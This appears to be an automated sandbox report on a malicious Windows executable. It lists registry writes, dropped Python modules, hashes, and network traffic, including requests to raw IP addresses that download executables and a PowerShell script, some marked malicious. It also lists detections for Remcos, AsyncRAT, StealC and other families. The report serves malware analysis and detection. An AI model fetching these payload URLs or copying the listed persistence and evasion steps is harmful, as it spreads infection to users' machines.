0005000000050000000500000003200000032000000320000007800000078000000500000003C0000005000000064000000780000003200000078000000780000003200000050000000500000005000000050000000C8000000000000000100000002000000030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F000000100000001100000012000000130000001400000015000000160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F000000200000002100000022000000230000002400000025000000260000002700000028000000290000002A0000002B0000002C0000002D0000002E0000002F00000000000000000000001F00000000000000B400000032000000D8000000640000006400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000002000000030000000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000
(PID) Process:	(4772) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010402
Operation:	write	Name:	VirtualDesktop
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:	(4772) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000020474
Operation:	write	Name:	VirtualDesktop
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:	(12092) evetbeta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\remcos_yxflxtczmk
Operation:	write	Name:	EXEpath
Value: ®cMÍ¦*‰oòûÚ+Ãm.}Ì,ZZ}j"¡îooõ§‰¸è2¬J¨íÌ}
(PID) Process:	(4772) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000002046A
Operation:	write	Name:	VirtualDesktop
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:	(4772) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000070236
Operation:	write	Name:	VirtualDesktop
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:	(10284) nudwee.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:

Add for printing

Executable files

361

Suspicious files

Text files

134

Unknown types

Dropped files

PID	Process	Filename		Type
3924	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI39242\_bz2.pyd		executable
		MD5:684D656AADA9F7D74F5A5BDCF16D0EDB	SHA256:A5DFB4A663DEF3D2276B88866F6D220F6D30CC777B5D841CF6DBB15C6858017C
4772	explorer.exe	C:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat		binary
		MD5:E49C56350AEDF784BFE00E444B879672	SHA256:A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E
3924	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI39242\_overlapped.pyd		executable
		MD5:363409FBACB1867F2CE45E3C6922DDB4	SHA256:F154AC9D5CA0646D18F6197C0406F7541B6E0752B2D82A330036C1E39D3A49E7
3924	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI39242\_lzma.pyd		executable
		MD5:D63E2E743EA103626D33B3C1D882F419	SHA256:7C2D2030D5D246739C5D85F087FCF404BC36E1815E69A8AC7C9541267734FC28
3924	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI39242\_queue.pyd		executable
		MD5:CC0F4A77CCFE39EFC8019FA8B74C06D0	SHA256:DEE7D19A9FCAB0DF043DC56F2CDC32F1A2A968AB229679B38B378C61CA0CBA53
3924	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI39242\_cffi_backend.cp313-win_amd64.pyd		executable
		MD5:5CBA92E7C00D09A55F5CBADC8D16CD26	SHA256:0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85
3924	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI39242\_ctypes.pyd		executable
		MD5:29873384E13B0A78EE9857604161514B	SHA256:3CC8500A958CC125809B0467930EBCCE88A09DCC0CEDD7A45FACF3E332F7DB33
3924	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI39242\_hashlib.pyd		executable
		MD5:3E540EF568215561590DF215801B0F59	SHA256:0ED7A6ED080499BC6C29D7113485A8A61BDBA93087B010FCA67D9B8289CBE6FA
3924	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI39242\_socket.pyd		executable
		MD5:566CB4D39B700C19DBD7175BD4F2B649	SHA256:77EBA293FE03253396D7BB6E575187CD026C80766D7A345EB72AD92F0BBBC3AA
3924	main.exe	C:\Users\admin\AppData\Local\Temp\_MEI39242\_multiprocessing.pyd		executable
		MD5:807DD90BE59EA971DAC06F3AAB4F2A7E	SHA256:B20DD6F5FAB31476D3D8D7F40CB5AB098117FA5612168C0FF4044945B6156D47

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

824

TCP/UDP connections

10 589

DNS requests

400

Threats

2 061

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	200	2.21.240.93:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
1268	svchost.exe	GET	200	2.21.240.93:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
1268	svchost.exe	GET	200	2.21.189.233:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
—	—	GET	200	2.21.189.233:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
2780	main.exe	GET	200	45.141.233.85:80	http://45.141.233.85/uk.exe	unknown	—	—	unknown
2780	main.exe	GET	—	198.55.98.29:80	http://198.55.98.29/HOST/BM.ps1	unknown	—	—	unknown
2780	main.exe	GET	—	176.46.157.32:80	http://176.46.157.32/files/6691015685/lmdbDQC.exe	unknown	—	—	malicious
2780	main.exe	GET	—	198.55.98.29:80	http://198.55.98.29/HOST/VZXCHH66.exe	unknown	—	—	unknown
2780	main.exe	GET	—	176.46.157.32:80	http://176.46.157.32/testmine/random.exe	unknown	—	—	malicious
2780	main.exe	GET	—	176.46.157.32:80	http://176.46.157.32/files/7453936223/xgixRpV.exe	unknown	—	—	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
5944	MoUsoCoreWorker.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	2.21.240.93:80	crl.microsoft.com	Akamai International B.V.	SE	whitelisted
1268	svchost.exe	2.21.240.93:80	crl.microsoft.com	Akamai International B.V.	SE	whitelisted
1268	svchost.exe	2.21.189.233:80	www.microsoft.com	Akamai International B.V.	GB	whitelisted
—	—	2.21.189.233:80	www.microsoft.com	Akamai International B.V.	GB	whitelisted
1268	svchost.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
2780	main.exe	199.232.174.49:443	urlhaus.abuse.ch	FASTLY	GB	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	4.231.128.59 20.49.150.241	whitelisted
crl.microsoft.com	2.21.240.93	whitelisted
google.com	142.250.179.142	whitelisted
www.microsoft.com	2.21.189.233	whitelisted
urlhaus.abuse.ch	199.232.174.49	whitelisted
kaczor.org	66.235.200.171	unknown
github.com	140.82.121.4	whitelisted
lomejordesalamanca.es	188.164.198.15	unknown
hbws.cc	185.208.158.17	unknown
www.vuelaviajero.com	208.109.201.79	unknown

Threats

PID	Process	Class	Message
2780	main.exe	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 5
2780	main.exe	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 44
2200	svchost.exe	Potentially Bad Traffic	ET DNS Query for .cc TLD
2780	main.exe	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 5
2780	main.exe	Potential Corporate Privacy Violation	POLICY [ANY.RUN] Python Suspicious User Agent
2780	main.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
2780	main.exe	Potentially Bad Traffic	ET INFO PS1 Powershell File Request
2780	main.exe	Potential Corporate Privacy Violation	POLICY [ANY.RUN] Python Suspicious User Agent
2780	main.exe	Potential Corporate Privacy Violation	POLICY [ANY.RUN] Python Suspicious User Agent
2780	main.exe	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 61

Add for printing

No debug info

General Info

main.exe

C942A56638772644D847709D906FA23D

12D6B77FEC2244CDC4050A083AA741185CC48010

56A28391D309102557FCF9BC34351A50B49054282F2007851DCBC4E825E7C37A

98304:R/0Cg6brcfRkzKVfq7AnYRO4Y6ZhkDQet54netUjZUj0vNQLFZfQpyJoic3yjHFD:ivfkEwE1MUQ881mw02/ki+BIsG

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Uses Task Scheduler to autorun other applications

PHISHING has been detected (SURICATA)

CLICKFIX has been detected (SURICATA)

GENERIC has been found (auto)

Bypass execution policy to execute commands

Changes powershell execution policy (Bypass)

COINMINER has been found (auto)

ASYNCRAT has been found (auto)

GH0ST has been found (auto)

METERPRETER has been found (auto)

METERPRETER has been detected (SURICATA)

METASPLOIT has been detected (SURICATA)

STEALC mutex has been found

STEALC has been detected

REMCOS mutex has been found

REMCOS has been detected

Application was injected by another process

Runs injected code in another process

METASPLOIT has been found (auto)

Changes the autorun value in the registry

AMADEY mutex has been found

NANOCORE has been found (auto)

Create files in the Startup directory

RHADAMANTHYS has been found (auto)

AMADEY has been detected (SURICATA)

NJRAT has been found (auto)

QUASAR has been found (auto)

REMCOS has been detected (SURICATA)

Connects to the CnC server

AZORULT mutex has been detected

Attempting to scan the network

ASYNCRAT has been detected (MUTEX)

BAZALOADER has been found (auto)

Executing a file with an untrusted certificate

NJRAT mutex has been found

STEALER has been found (auto)

PURELOGS has been detected (SURICATA)

Run PowerShell with an invisible window

PURELOGS has been found (auto)

RAT has been found (auto)

QUASARRAT has been found (auto)

Changes Windows Defender settings

Adds path to the Windows Defender exclusion list

HAVOC has been found (auto)

DCRAT has been found (auto)

NjRAT is detected

Downloads the requested resource (POWERSHELL)

XWORM has been detected (SURICATA)

NJRAT has been detected (SURICATA)

FORMBOOK has been found (auto)

PYTHONSTEALER has been found (auto)

REMCOS has been found (auto)

Uses AES cipher (POWERSHELL)

QUASAR mutex has been found

Request from PowerShell which ran from CMD.EXE

SUSPICIOUS

Executable content was dropped or overwritten

Process drops python dynamic module

The process drops C-runtime libraries

Process drops legitimate windows executable

Application launched itself

Loads Python modules

Starts CMD.EXE for commands execution

The process checks if it is being run in the virtual environment

Process requests binary or script from the Internet

Connects to unusual port

Block-list domains

Executing commands from a ".bat" file